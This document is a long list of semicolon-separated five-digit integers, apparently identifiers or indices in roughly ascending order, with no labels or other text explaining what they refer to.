25468;25469;25375;25376;25377;25378;25379;25380;25559;25449;25450;25507;25470;25471;25508;25509;25510;25511;25617;25618;25587;25588;25589;25590;25657;25658;25619;25716;25659;25621;25620;25630;25631;25745;25717;25746;25747;25910;25783;25839;25838;25862;25863;25864;25911;25865;25912;25939;25940;25941;25913;25975;25976;25977;25978;25979;25980;26081;26036;26082;26083;26114;26115;26932;26116;26933;27058;26934;26935;26936;27059;27060;27061;27631;27632;27633;27634;27635;27636;27637;27638;28232;27639;28233;28234;29196;28314;28315;29198;29197;29286;29285;29287;29843;29844;30070;29845;29846;30071;29847;29848;29862;29863;29864;29865;29940;29941;29942;29943;29944;29945;29946;30027;29947;29948;30028;29949;29985;29986;29987;31361;29988;29989;30156;30072;31427;30073;30074;30075;30076;30077;30078;30079;30080;30081;30082;30083;30084;30113;30233;30085;62271;62272;62273;62274;36704;62275;62276;31362;34965;34966;37222;30086;37932;36311;30114;37675;36774;30115;35012;36853;35013;35226;35014;36755;35015;35227;37165;35044;37734;35045;35385;30087;37823;36373;35046;38122;35047;35078;37147;35079;35048;35049;35062;35063;35064;36742;37924;35065;37255;35092;35093;35094;37348;30234;35095;35096;35097;35098;37057;37657;37313;35099;30235;37488;35228;36460;37100;38098;36324;38006;37149;35229;35230;35231;35232;36447;36894;35233;35234;35235;37257;35236;35237;37568;35238;35239;35264;35255;35256;36570;35265;35266;37268;36266;36263;37604;35267;37013;35386;35387;35665;35592;30157;30158;30159;30160;30161;30162;30163;30236;30237;30238;31057;31058;30239;30240;31029;31059;31030;31061;31060;31063;31062;31065;31064;31066;31067;31068;31069;31070;31071;31072;31073;31075;31074;31077;31076;31078;31079;31080;31103;31104;31105;31106;31107;31108;31171;31172;31124;31363;31152;31173;31153;31174;31175;31176;31177;31178;31179;31180;31181;31364;31182;31311;31312;31313;31314;31812;31315;31316;31365;31317;31318;31813;31814;31325;31326;31366;31367;31428;31369;31368;31370;31371;31372;31373;31374;31375;31429;31430;31431;31432;31433;31434;31435;31436;31664;31665;31970;31666;31667;31669;31668;31971;31670;31688;31689;31690;31691;32087;31692;31712;31713;31743;31742;31744;31745;31746;31815;31747;31748;31749;31750;31751;31816;31817;31818;31819;31820;31821;31822;31823;31824;31825;31826;31827;31828;31829;31972;31973;31974;31975;31976;31977;31978;31979;31980;32382;31981;31982;32036;32038;32037;32039;32040;32041;32042;32043;32044;32088;32089;32090;32091;32092;32093;32094;32095;32096;32097;32098;32099;32100;32101;32102;32104;32103;32105;32106;32107;32108;32109;32196;32197;32198;33143;32199;32200;32201;32202;32203;32204;33144;32205;32207;32206;32327;33231;32328;32329;32458;32330;32331;32332;32333;32334;32335;33232;32336;32337;32338;32339;32340;32341;32342;32343;32344;32459;32345;32346;32347;32348;32349;32460;32383;32384;32385;32387;32386;32408;32410;32409;32411;32412;32413;32436;32414;32437;32438;32461;32463;32462;32464;32465;32466;32468;32467;32469;32483;32484;32486;32485;33078;33079;33080;33081;33082;33083;33112;33113;33114;33115;33116;33117;33145;33146;33147;33148;33149;33150;33179;33180;33181;33182;33184;33183;33185;33221;33222;33233;33234;33368;33369;33235;33370;33236;33237;33238;33259;33261;33260;33262;33263;33264;33371;33372;33373;33404;33405;33406;33407;33408;33409;33410;33411;33412;33413;33414;33415;33416;34124;34421;33417;33418;33453;33454;33455;33456;33457;33458;33459;33468;33469;33470;33535;33839;33514;33515;33536;33516;33840;33517;33518;33519;33537;33520;33521;33538;33539;33540;33541;33542;33543;33553;33554;33555;33569;33841;33842;33765;33776;33766;33767;33768;33777;33769;33770;33778;34172;33843;33844;33845;33846;33847;34100;33883;34101;34102;34103;34125;34126;34128;34127;34129;34130;34131;34132;34133;34134;34135;34137;34136;34138;34139;34422;34140;34279;34142;34141;34143;34144;34145;34147;34146;34148;34149;34150;34173;34174;34175;34176;34177;34178;34180;34179;34181;34182;34183;34185;34184;34186;34187;34203;34204;34224;34225;34226;34227;34280;34282;34281;34423;34283;34284;34305;34285;34286;34287;34306;34313;34307;34314;34308;34309;34479;34341;34342;34377;34376;34343;34344;34356;34357;34378;34379;34380;34381;34425;34424;34426;34427;34451;34452;34480;34454;34453;34455;34481;34710;34456;34711;34493;34482;34483;34494;34495;34670;34671;34673;34672;34674;34675;34712;34701;34676;34677;34713;34681;34683;34682;34684;34702;34703;34705;34704;34758;34706;34759;34707;34714;34746;34715;34747;34716;34717;34721;34722;34824;34748;35016;34749;35017;34750;34825;34760;34761;34774;34775;34776;34777;34778;34826;34827;34828;34829;34830;34831;34832;34833;34834;34835;34837;34836;37315;37735;36933;37326;35388;35389;35390;37525;36641;35391;37912;37801;35392;35393;35394;35395;35396;35397;36344;35398;35438;37219;37826;37803;36411;35399;37860;35400;36222;35455;36929;37875;35593;37157;35456;36767;35404;35439;35440;37773;35464;35441;37947;37071;35457;38129;38028;35666;37560;36322;35465;41973;42374;41974;41975;42375;42072;42073;42121;42122;42123;42267;42074;42268;42124;42152;42376;42153;42125;42126;42269;42127;42270;42128;42377;42154;42155;42156;42157;42158;42444;35466;42445;42446;42447;42448;42271;42192;42193;35693;42194;42449;42195;42272;42273;42786;42274;36971;42378;42881;42379;42275;42276;42882;42277;42278;42279;42280;42281;42787;42827;42297;35560;42935;42380;42381;42382;42383;42384;42385;42386;42401;42400;42965;42402;42403;42883;42884;42450;42451;42452;42453;42936;42901;42902;42903;36779;42802;42803;42804;42805;42806;42807;42984;42904;42905;42906;42907;42985;42845;42846;42848;42847;42849;42986;42988;42987;37553;44877;35561;42885;37289;43008;42908;36882;43113;42909;42910;43327;42911;37279;43328;42937;42938;42939;42941;42940;42942;43114;42966;43370;43371;47167;43115;35594;44878;43611;43602;43090;43329;43009;43010;43011;43012;43013;43372;43014;47168;43032;43591;35595;43033;43034;43116;43035;43117;43612;43036;43118;37680;37960;35596;43330;43091;43092;43373;43119;43103;43120;43121;43122;43123;43124;43126;43125;44879;43331;43165;43166;43332;47169;43603;43604;47170;43333;43334;43335;43336;43337;43338;43339;43340;43341;35734;43374;43375;44880;44881;44882;43592;43593;43606;43607;44883;35597;43594;43595;37881;37378;35604;35667;36955;35668;35669;37920;35670;36489;36702;35671;35735;36304;37466;35694;36913;36301;35781;37388;36735;35933;37687;35720;35808;36796;37727;35744;35745;36603;37133;35746;37641;36945;35753;36780;35756;36748;37543;35782;36996;35959;35783;35769;38079;35960;36291;35801;35802;36866;36875;35909;36287;35926;35927;38159;37482;36068;35934;37423;35961;37264;37872;35962;37197;39392;36108;36660;36233;35981;36320;35982;36827;35983;35984;37905;37136;35994;35995;35996;36811;36384;38080;35997;36022;37306;36023;37444;37323;36024;36025;36503;36026;37242;37633;36041;37824;36054;37911;37813;36156;36905;36077;37298;36091;36109;37599;36110;37517;36124;36125;37865;37541;37753;36126;37866;38669;38796;38670;38672;38671;39592;39593;36165;36312;36166;37055;36703;36175;36190;36706;38184;36209;38956;37075;38185;36210;36261;36211;37870;38957;38160;37309;38673;38726;38674;38727;38186;38187;38188;38189;38835;38675;38676;38809;38811;38810;38916;39453;38749;38748;38958;38750;38959;38960;38993;38994;38797;38798;38812;38836;38837;38961;38962;38862;38863;38904;38905;38906;39393;38907;38931;39474;39475;39476;38908;38917;38918;38919;38932;38933;38934;38935;38936;38937;38995;38938;38939;38940;38941;38996;38997;38942;38943;39394;38998;38999;39000;39395;39396;39503;39397;39539;39504;39398;39399;39400;39771;39401;39540;39505;39402;39541;39403;39404;39405;39406;39407;39542;39454;39455;39543;39456;39457;39458;39544;39459;39477;39545;39546;39506;39507;39508;39509;39510;39511;39512;39513;39844;39547;39548;40828;40474;39602;39603;39604;39605;39606;39607;39608;39609;39610;39611;39612;39613;39772;39854;39773;40948;40580;39774;39855;39845;39846;40409;39847;40410;39856;39857;39858;39859;39861;39860;39862;39863;39864;40346;39865;39866;40347;40424;40356;40357;40358;43015;40395;40411;40413;40412;40425;40414;40427;40426;40428;40451;40452;40453;40481;40454;40455;40475;40476;40456;40482;40670;40483;40484;40754;40504;40505;40829;40628;40627;40506;40507;40755;40514;40830;40515;40774;40756;40516;40757;40517;40534;40535;40536;40579;40566;40567;40949;40568;40569;40950;40570;40581;40582;40671;40599;40600;40601;41628;40672;40602;40603;40604;40831;40832;41629;40605;40606;40629;40863;40673;40864;40674;40675;40676;40677;40678;40679;40680;40681;40682;40833;40683;40684;40685;40686;40687;40688;40689;40690;40758;40759;40865;40866;40780;42454;40809;40810;40854;40855;40856;40857;40951;40952;40867;41630;41631;40909;40908;41632;41609;40895;40990;40896;41633;40897;40991;40898;40953;40954;40955;40956;41015;41016;40993;40992;40994;40995;41610;40996;41611;41017;41018;41019;41020;41612;41613;42387;41614;42045;41634;41635;42282;41636;47171;42283;47172;44884;47173;47174;47175;47176;47177;44885;44886;44887;44888;47178;47179;44889;47180;50669;47181;47182;47183;47184;47185;47186;47187;47188;47189;47190;47191;47192;47194;47193;47195;47196;47198;47197;47199;47200;47201;47202;47203;47204;47205;47206;47207;47208;47209;47835;47210;47211;47212;47213;47214;47215;47216;47217;47684;47218;47219;47220;47221;49152;47222;47719;47596;47585;47223;47224;47225;47226;47768;47227;47586;47228;47597;47229;47598;47720;47607;47608;47564;47565;47673;47674;47230;47587;47609;47610;47599;47611;47685;47612;47686;47675;47769;47770;47721;47836;47613;47231;47837;47771;47772;47614;47687;47722;47838;47723;47724;47839;48226;47840;48355;48356;47232;48206;50428;47841;48227;48357;47807;48324;48410;47808;47809;47811;47810;48358;47812;48376;47813;47842;47843;47844;47233;48304;48228;48229;47845;48305;48411;47846;47847;47234;47848;47849;48230;47850;47851;47235;48412;48207;48208;47236;47237;47238;48325;48326;47240;47239;47242;47241;48929;49677;48306;48359;49090;48377;48930;48307;48388;49649;48378;48746;49650;49091;48308;48389;48277;49660;49073;48365;53394;47243;48413;48309;48327;48310;48425;48426;48328;48330;48329;48331;47244;47245;49104;48390;48391;50389;48747;48366;47246;48368;48367;48369;48414;48913;48914;48415;49105;48379;48931;48932;49106;49153;48897;49074;48392;48393;48394;48395;47247;48416;48417;49107;48418;48420;48419;49059;49060;49092;49093;49075;47248;49094;49095;48748;48915;49293;48916;49294;49122;49154;49061;49155;49096;49156;49157;47249;49194;47250;47251;47252;49158;47253;49159;49160;49097;49076;49185;49077;47254;49195;49196;49678;49679;49680;49718;49239;49240;49241;49242;49161;49243;49244;49245;47255;49162;49163;49197;49164;49165;49198;49186;49246;49187;49295;49661;49199;49188;49200;49201;49937;47256;49247;49681;49979;49938;49719;49682;49248;49720;49662;49664;49663;49249;49635;51344;47257;51345;49296;49721;49297;47258;49722;49651;49723;49724;49725;49683;49684;49816;49685;50697;49782;49726;49727;47259;49817;49783;47260;49768;47261;47262;50454;49769;49939;49980;49818;49819;49981;49820;50354;50455;49821;47263;49982;49940;50025;49968;49983;50026;49985;49984;49986;50293;50294;51464;49987;50437;50004;49988;50005;50390;50006;49969;50391;50027;50392;50028;50393;50029;50030;50031;50032;50033;50034;50477;50355;50394;50395;50396;50532;50438;50295;50439;50035;50036;50007;50397;50310;50311;50496;50593;50497;50478;50356;50312;50440;50398;50456;50419;50457;50420;50441;50421;50399;50479;50584;50585;50480;50586;50481;50482;50483;50484;50587;50588;50400;50458;50589;50485;50401;50414;50468;50402;50422;50506;50403;50507;50498;50564;50499;50565;50442;50443;50444;50515;50516;50517;50518;50566;50519;50520;50550;50551;50552;50553;50554;50459;50486;47264;50555;50556;50626;50557;50508;47265;47266;47267;50567;50594;50568;50590;50591;47268;50595;50596;50682;50592;47269;50615;50683;50617;50616;50684;50662;50685;50618;50663;50698;50671;50670;50619;50672;50673;50812;50674;50813;50664;50675;50656;50655;50657;47270;50833;50834;50814;50972;50847;50835;47271;47272;50836;50837;51064;47273;47274;51065;51082;51081;50866;51083;47275;51099;50867;51084;47276;50979;51066;51067;47277;51346;51068;51147;51148;51149;51150;51193;47278;47279;47280;51347;51129;51130;51131;51137;51151;47281;51348;51390;51362;51361;51405;51406;51412;51373;51374;51375;51407;51376;51413;51414;47282;51377;51429;51415;51381;51382;51383;51402;51403;51391;51392;51378;53395;51408;51409;47283;47284;51430;51419;51431;51441;47285;51442;51443;47286;47287;47288;47289;47290;47291;47292;47293;47294;47295;47296;47297;47298;47299;47300;47301;47302;47303;47304;47305;47306;47307;47308;47309;47310;47311;47312;47313;47314;47315;47316;47317;47318;47320;47319;47321;47322;47323;47324;47326;47325;47328;47327;47329;47330;47331;47332;47333;47334;47335;47336;47338;47337;47339;47340;47341;47342;47343;47344;47345;47346;47347;47348;47349;47350;47351;47352;47353;47354;47355;47356;47357;47358;47359;47360;47361;47363;47362;47364;47365;47366;47367;47368;47370;47369;47371;47372;47373;47374;47375;47376;47377;47378;47379;47380;47381;47382;47383;47384;47385;47386;47387;47388;47389;47390;47391;47392;47393;47394;47395;47396;47397;47398;47399;47400;47401;47402;47403;47404;47405;47406;47407;47408;47409;47410;47411;47413;47412;47414;47415;47416;47417;47418;47419;47420;47421;47422;47423;47424;47425;47426;47427;47428;47429;47430;47431;47615;47432;47433;47434;47435;47436;47437;47438;47439;47440;47441;47442;47443;47444;47445;47446;47447;47448;47449;47450;47451;47452;47453;47454;47455;47456;47457;47459;47458;47460;47461;47462;47463;47464;47465;47466;47467;47468;47469;47470;47471;47472;47473;47474;47475;47476;47477;47478;47479;47480;47481;47482;47483;47484;47485;47486;47487;47488;47489;47490;47491;47492;47493;47494;47495;47496;47497;47498;47499;47500;47502;47501;47503;47504;47505;47506;47507;47508;47509;47510;47511;47512;47513;47514;47515;47516;47517;47518;47519;47520;47521;47523;47522;47524;47525;47526;47527;47528;47529;47530;47531;47532;47533;47534;47535;47536;47537;47538;47539;47540;47600;47541;47543;47542;47544;47545;47546;47547;47548;47549;47550;47551;47566;47552;47676;47553;47554;47555;51448;51449;51576;51577;54631;51512;52552;51565;51947;54632;51948;51513;51444;51514;51515;51516;51517;51518;51519;51445;51465;51578;51579;51646;51647;51648;51649;51650;51651;51652;51653;51654;51853;51655;51787;51656;51854;51566;51788;51580;51678;51679;51581;51680;51681;51821;51820;51822;51830;53901;55002;51823;51831;51855;51856;51863;51864;52004;53478;51896;51842;51927;51897;55943;55944;55984;55865;55866;55867;55868;55945;55909;55910;55946;55869;55870;55947;55890;55891;55948;55985;56095;56096;56075;56076;55986;55960;55949;55950;55951;55911;55952;55961;55962;55963;51980;55987;55988;56010;55989;51989;55892;56011;56146;51990;55954;55953;55893;55955;56012;56013;56180;56014;56286;55990;56147;56287;56148;56149;56131;56132;51949;56097;56181;56150;56219;56218;56015;56098;56100;56099;56151;56182;56102;56101;56183;56103;56104;56396;56105;56133;56134;56135;56136;56137;56138;56349;56106;56200;56107;56201;56350;52017;56202;56288;56302;56184;56351;56220;56152;52018;56153;52019;56185;56154;56186;56155;56156;56203;56221;56289;56232;56222;51960;56157;56352;56353;52033;56158;56224;56223;56354;56225;56233;56355;56322;56226;56227;56228;56356;52705;56357;56290;52034;56291;56292;51961;56358;56359;56293;52569;56294;56217;52570;51981;56360;56295;52514;52515;56416;56303;56361;56309;56308;56234;56362;56364;56363;56365;56417;56418;56366;56367;56341;56368;56419;56386;56369;56382;56370;56397;56537;56421;56420;56573;56572;56422;56342;56423;56371;56538;56539;56540;56515;56516;56517;52464;56473;56424;56457;56475;56474;56518;56398;56519;56486;56487;56488;56489;56696;56520;56541;56542;56543;56544;56717;56655;56656;56545;56546;56547;52465;56787;56788;56931;56930;56574;56575;56851;56932;56852;56885;57141;56933;56886;56887;56673;56789;57069;57308;56888;56718;56934;56790;56935;56936;56889;56890;56791;56792;56793;56731;56794;56732;56719;57070;56720;56795;57071;56733;52516;57072;56796;56863;56721;56864;56813;56697;56814;56937;56815;56938;56891;56939;56892;56893;56722;56797;56798;56799;56800;57142;56950;56801;56802;56894;56895;56896;56924;56940;56925;56963;56926;56865;56918;56964;56965;56966;56897;57000;56951;56952;56898;57006;57007;57001;56899;52517;56941;57324;57325;57754;57143;52005;56967;57073;57002;52057;52006;57003;57004;57008;57009;57074;57075;57076;52159;57077;57078;57326;52518;57327;57366;57367;57368;57369;57416;57417;57418;57309;57328;57382;57383;57384;57385;57419;57420;57386;57387;57388;57476;57437;57421;57438;57422;57439;57423;57424;57440;57401;57425;57441;57622;57389;57442;57443;57477;57450;57478;57444;57451;57452;57714;52466;52467;52485;52538;52539;52519;52520;52553;52742;52554;52743;52744;52555;52571;52556;52558;52557;52560;52559;52522;52521;52623;52622;52561;52759;52624;52601;52540;52602;52572;52603;52604;52573;52638;52562;52574;52661;52625;52639;52675;54834;52662;52663;52640;52981;52982;52641;52692;52590;52643;52642;52644;52645;52693;53435;52646;52591;52676;52647;52677;52694;52695;52678;52679;52664;52680;52681;52721;52665;52722;52724;52723;52725;52696;52706;52697;52726;52727;53240;52950;52951;52952;53241;52953;52745;52964;52965;52746;53516;52983;56296;53305;52999;53000;53306;53213;53214;53215;53363;53216;53199;52984;52985;53364;53345;53365;52954;53366;53242;53243;52955;53200;53452;53201;53261;53202;53262;53263;53264;53203;53225;53367;53436;53437;53265;53300;53299;53325;53326;53453;53406;53479;53438;55050;53550;53368;53396;53551;53541;53454;53455;53456;53457;53458;53459;53460;53461;53552;53462;53553;53480;53481;53463;53517;53518;53497;53519;53464;53508;53520;53465;53466;53467;53498;53554;53560;53499;53555;53556;53521;53557;53522;53561;53562;53537;53563;53849;53606;53607;53564;53565;53609;53608;53816;53566;53610;53567;53578;53611;53635;53634;53612;53817;53818;53627;53834;53835;53613;54286;53614;53863;53864;53644;53645;53615;53865;53866;55386;53902;53903;53904;53850;53836;53851;54944;54292;54293;54608;54609;54294;54295;54572;54573;54633;54574;54634;54957;54635;54575;54296;54297;54576;54636;54824;54907;55051;54975;54908;55052;54909;54910;54976;54637;54911;54912;54913;54835;54836;54837;54958;54914;55387;54977;55003;54946;54947;54915;54916;54917;54959;55053;54978;54948;54949;54960;54961;55054;55055;54950;55056;54962;54963;55004;55005;55006;55007;55057;55147;55058;55148;55059;55149;55150;55492;55008;54979;54980;55493;55494;55151;55495;54945;55152;55061;55060;54981;55153;55154;55062;55388;55389;55155;55390;55391;55156;55392;55393;55578;55675;55676;55394;55475;55476;55425;55496;55461;55412;55463;55462;55464;55579;55580;55465;55466;55556;55426;55842;55427;55497;55545;55871;55428;55498;55499;55525;55526;55654;55655;55599;55600;55527;55601;55602;55546;55557;55581;55558;55528;55559;55500;55560;55501;55582;55529;55656;55595;55561;55596;55657;55583;55603;55604;55611;55562;55658;55659;55660;55661;56108;55662;55738;55612;55677;55678;55680;55679;55739;55740;55750;55751;56016;55872;55663;55873;55752;55874;55875;55876;55807;55741;55760;55808;55753;55742;55843;55743;55766;55767;55744;55771;55777;55844;56297;55778;55772;55779;55781;55780;55754;55782;55783;57544;57584;57545;57453;57563;57479;57564;57565;57566;57546;57590;57715;57716;57591;57592;57547;57623;57703;57624;57670;57644;57548;57625;57549;57645;57609;57626;57717;57694;57695;57718;57610;57671;57627;57672;57611;58461;58462;57755;57756;57781;57782;57783;57784;57673;57674;57897;57719;57815;57828;57881;57898;57816;57829;57865;57899;60006;60007;59972;59973;59826;59940;59974;57757;59975;59941;59976;60069;62724;62725;60070;60071;60128;60073;60072;60074;57866;60157;57986;57867;60158;60122;61416;61465;60123;57987;60075;60129;60130;60131;60113;61417;61383;60143;60144;60132;61384;60145;61418;60146;60147;60148;61419;60149;61466;57868;60133;61385;61386;61420;61421;61387;61442;61467;61468;61422;61423;61469;61470;61471;61472;61496;61473;61424;61474;61475;61476;61497;61477;61425;57817;61498;61499;61500;61579;57882;61580;61663;61664;61521;61556;61581;61613;61582;61628;61583;61665;61666;61667;61684;61614;61685;61615;61616;61629;61630;61631;61632;61633;61634;61635;61636;61637;57900;62128;58013;61584;61686;61668;61669;62129;62130;62131;62132;61601;61697;61698;61699;57901;61602;61687;61688;61755;58014;61700;61670;61671;61672;57902;62133;61673;61674;62134;62135;62136;62017;61701;61702;61756;62018;61776;61777;61778;61703;62137;62138;61757;61758;61736;61737;61638;61738;58120;57952;61779;62050;57869;58121;57953;58122;61739;62139;61724;61759;62140;62019;62141;62020;62021;58123;57954;62417;62142;62143;62189;61761;61760;62034;62035;62144;62145;62146;62147;62051;62052;57903;62053;62190;62191;62148;62149;57904;62150;62151;62152;62153;62154;62155;62157;62156;62158;62159;62160;62161;62162;62163;62164;62319;62192;62320;62165;62321;62322;58015;62323;62166;62324;57965;62378;62377;62294;58044;62226;62167;62227;62295;62325;57966;62418;62326;62397;62327;58045;62328;62329;62330;62331;62228;62332;62789;62333;62334;62335;62336;62229;62230;62441;62337;62231;62232;62442;62233;62338;62193;62443;62339;62398;62296;62399;64083;62297;62234;62550;64440;62790;62654;62419;62420;62421;62525;62526;57905;57906;62400;62449;58016;62527;62567;62454;58017;62502;62668;62455;58018;62528;62655;62456;62529;62530;62600;62531;62470;58046;62486;62568;62645;62551;62569;62601;58047;62532;62533;62534;63195;62726;62602;62535;62603;62604;62605;62727;62606;62570;58048;62696;62487;62697;62536;58049;62646;62656;58050;62503;62537;62538;62647;62552;62749;62657;62658;58079;62607;62839;62648;62670;62669;62671;62779;62608;62610;62609;62672;62873;62673;62750;58252;62765;62728;62729;62698;62863;62822;62823;57988;57989;62699;58187;62751;62752;63029;57990;62766;62767;62730;62824;62825;62768;62840;62841;62826;62827;62864;62865;57967;62889;62842;62753;62828;62829;62754;62769;58188;58019;62843;62912;62844;62874;62845;58080;62846;62875;62847;62848;62849;62950;62850;62951;62876;62851;62852;62830;62877;62894;62878;62831;62853;62854;63101;62879;62895;62896;62952;62855;62880;62881;63007;63008;62882;63102;62883;65531;62913;62970;62971;62914;63208;58149;63030;62915;62953;58189;62954;63031;62955;63032;62978;63033;63034;63035;63009;63051;63010;63037;63036;63038;63039;63040;63041;63127;63081;63282;63042;63043;63044;63045;63128;63103;63046;63082;58098;58253;63083;63084;63052;63085;63086;63129;58020;63130;63087;63088;63047;63172;63131;63053;63011;63054;63196;63307;63089;63012;63013;63014;63173;63090;63048;63055;63138;63139;63140;63056;58150;63233;63209;63141;63142;63057;58151;63234;63132;63235;63175;63174;63176;63246;58051;63247;63177;63178;63179;58152;63248;63482;63143;58153;63133;63210;63180;63189;63197;63249;63198;63250;63483;63211;63212;63236;63213;63237;63238;64882;63239;63484;63214;63251;63327;63252;63274;63253;63387;63254;63215;63181;63360;63328;63275;63255;63276;63485;63486;63277;63487;63488;63513;58155;58154;63361;65180;63489;63308;63490;63216;63240;63491;63309;63524;63458;63492;63278;63310;63283;63329;58156;63493;63363;63362;63494;63375;63495;63336;63311;65823;63388;63496;63389;63343;63391;63390;63330;63497;63393;63392;63498;63499;63500;63376;63377;63378;63394;63400;63459;63501;63460;58157;58278;58124;58158;58125;58126;58159;58160;58686;58190;58305;58191;58254;58306;58255;58256;58279;58622;58307;58623;58280;58257;58308;58281;58161;58282;58258;58296;58259;58297;58418;58309;58364;58463;58260;58464;58310;58311;58366;58365;58367;58368;58369;58370;58312;58371;58346;58372;58687;58542;58543;58487;58336;58337;58373;58405;58374;58406;58375;58544;58376;58488;58465;58419;58688;58689;58420;58545;58377;58466;58546;58467;58489;58468;58547;58548;58690;58691;58549;58624;58625;58626;58550;58627;58692;58551;58730;58421;58694;58693;58695;58668;58469;58470;58553;58552;58554;58696;58697;58698;58699;58731;58669;58700;58701;58702;58703;58704;58705;58706;58707;58708;58709;58779;58628;58629;58630;58631;58632;58555;58633;58924;58634;58635;58636;58637;58638;58780;58781;58710;58782;58783;58732;58733;58711;58805;58712;58784;58785;58818;58819;58820;58821;58856;58639;58786;58822;58713;58714;58857;58858;58715;58955;58925;58787;58926;58996;58788;58789;58823;58824;58825;58826;58827;58755;58834;58835;58859;58956;58860;58979;58861;58997;58909;58910;58911;58912;58885;58886;58887;58957;58914;58913;58915;58958;58960;58959;59256;58888;58836;58980;58927;58928;58929;58930;59098;58862;59071;58931;58932;58916;58881;58933;58934;58935;58961;58863;59257;59079;58998;59080;58970;58917;58936;58981;61585;58918;59258;59450;58999;59259;59000;59001;59099;59002;59004;59003;59005;58919;59006;59100;59007;59008;58971;59022;59101;58982;59260;58983;58962;59023;59261;59081;58984;59331;58985;61478;59262;59198;59024;59025;59263;59264;59199;59082;59265;59072;59266;61479;59102;59217;59267;59268;59269;59270;59200;59201;59203;59202;59271;59204;59219;59218;59272;59295;59273;59531;59332;59296;59962;59333;59297;59274;59298;59205;59276;59429;59483;59277;59299;59278;59300;59301;59334;59335;59336;59337;59279;59338;59339;59389;59340;59280;59341;59342;59344;59343;59345;59346;59415;59379;59347;59348;59350;59349;59351;59352;59417;59416;59418;59419;59420;59421;59431;59430;59432;59433;59434;59571;59572;59532;59435;59353;59511;59533;59573;59512;59513;59484;59485;59486;59436;59437;59514;59390;59515;59487;59534;59535;59574;59536;59537;59538;59539;59661;59391;59540;59575;59576;59541;59542;59488;59543;59544;59545;59438;59840;59688;59689;59690;59691;59422;59577;59578;59579;59580;59581;59582;59799;59546;59662;59800;59720;59663;59664;59950;59692;59693;59694;59695;59665;59696;59951;59697;59801;59698;59547;59548;59841;59699;59739;59666;59842;59942;59549;59550;59740;59802;59741;59804;59805;59742;59806;59743;59744;59807;59808;59827;59943;59745;59944;59978;59977;63628;63627;63629;63502;63503;63504;63630;63583;63461;63514;63525;63505;63526;63527;63515;63649;65229;63528;63631;63529;65230;63530;63531;63632;63506;63507;63516;63517;64084;63508;63509;63518;63532;63650;63651;63462;69819;63633;64365;64366;63634;64367;63635;63510;63533;63636;63652;63653;64085;63654;63655;63624;64368;63656;63657;64398;63658;63659;63660;64086;64251;64252;64087;63584;64253;63585;63586;63661;63587;64399;64254;64400;64265;64266;64267;64460;63625;64255;64268;64256;64441;64369;64371;64370;67261;64269;67262;64372;67263;67264;67266;67265;67267;67268;67269;67270;67271;67272;67273;67274;67275;64088;67276;67277;67278;64270;67279;67280;64271;67281;67282;67283;68985;67284;67285;69288;67286;64272;67287;64273;64373;67288;67289;67290;64274;67291;67292;67293;67295;67294;67296;67297;64275;67298;67299;67300;64276;67301;67303;67302;67304;64277;67305;67306;67307;67308;67310;67309;67311;67312;68998;67313;67314;67315;67317;67316;64442;67318;64278;67319;67320;67321;64401;67322;67323;68999;67324;67325;67326;67327;67328;64402;67329;67330;67331;64403;67332;64404;67333;64405;67335;67334;67336;67337;67339;67338;67340;68860;68986;67341;64443;64406;69061;69000;64444;67342;69001;68890;68882;68883;68884;68885;68886;68887;68891;64445;64494;68892;68893;68894;67343;68895;64495;68972;69023;68896;68897;64407;69002;69003;64408;69004;65168;64409;65169;68861;69005;68987;69006;68988;69007;68989;68973;68974;64410;69024;69026;69025;68975;69027;70202;69062;69198;69199;69145;69146;64672;69147;69063;69064;69148;69149;69095;69150;69151;69152;69216;64446;69200;69201;69202;69203;69204;69153;69205;69085;69028;64592;69206;69207;69208;69209;69086;69217;69186;69355;69187;64447;69188;64411;64412;69210;69248;69211;64413;69403;69249;69380;69356;69289;69290;70203;64414;69298;69299;69381;69382;69300;69357;69358;64415;64416;69359;69360;69361;64417;69291;64418;69362;69383;69363;69292;69364;64257;69384;69385;64419;69386;69387;69388;69404;69389;69405;69365;69302;64420;69390;69391;69406;69407;69408;64461;69409;64593;69410;69411;69392;69393;69394;69460;64448;69461;64462;69485;70204;69450;70909;64463;69486;69782;64449;69783;69524;69525;64464;64450;69815;69462;69772;69527;69526;69436;69784;69528;69463;69529;69451;69531;69530;69532;69533;69452;69498;69773;69534;69487;69535;69543;69544;69774;69488;69785;69775;69793;69792;69536;69537;69886;69820;69887;69821;69545;69961;69805;69962;69963;69814;69857;69858;70048;70049;69896;70041;69897;70042;70050;70028;70029;64513;70051;70052;70043;69964;69965;64514;70053;70054;64496;70055;70030;70031;69910;70032;69966;69849;69967;70033;69859;70149;69911;70056;64497;64477;70035;70034;70057;64594;70044;70058;70045;64595;64538;64596;69917;70081;70059;70082;70106;70083;70150;70151;70107;70108;70152;64539;70153;70154;70155;70036;70061;69968;70060;70296;70037;70156;70205;70062;64540;70157;70504;70593;70046;70003;64597;64598;70063;70356;70064;64599;70038;70047;71542;70235;70065;70357;64600;70345;70206;70236;70237;70238;64541;70207;70158;70278;64542;70208;64543;70180;70358;70159;70279;70239;70280;71543;70297;64601;70181;70298;70304;70305;70359;64544;70808;71544;71545;70240;70209;70505;71081;70418;70506;70281;64545;70282;65231;70360;70361;70376;64546;70404;70377;70419;70405;70406;70420;64602;70421;70422;70423;70424;70425;70426;64673;70362;70427;70428;70528;70429;70407;70408;70430;70378;70431;70507;70508;70509;70409;70861;70510;70814;70927;70432;70410;70638;70637;70511;70928;70929;70433;70529;70639;70434;70512;70815;70435;70436;70816;70665;70666;64478;70549;70817;70550;70653;70654;70513;64625;70734;70655;70514;70640;70818;70819;70809;70641;70642;70667;70643;70668;70669;70644;70670;70810;70820;70821;70822;64515;70735;70823;70736;70700;70645;70594;70824;64868;70774;70775;70987;64733;64650;70671;70825;70826;71056;71057;70750;70776;71058;70811;70786;70827;70787;70788;70789;70812;64603;70930;70828;70829;70723;70813;70830;70751;70831;70939;70832;70839;70833;70862;70840;70931;71082;70841;70790;64674;70910;70863;70955;70864;70988;70989;64869;70834;70956;70957;70911;70912;70990;70992;70991;70993;71083;64651;70994;71059;64554;71060;64664;71061;71062;66337;71063;71064;71065;71066;71084;71085;66338;64665;70958;71086;64675;64676;71181;71142;71067;71147;71148;71149;71956;71150;64547;71151;71403;64677;71068;71404;71069;64548;71183;71182;64899;71405;71406;71407;64549;64883;64550;64604;72402;71087;71143;71326;64678;71247;71327;71328;71248;71408;71409;71410;71411;71255;71184;71279;71280;71281;71282;71358;71222;71413;71412;71775;71329;71359;71330;71360;71414;71415;71417;71416;71418;71249;71381;71361;71362;71363;71283;71185;71419;71364;71587;71331;71421;71420;71422;71423;71443;71256;71382;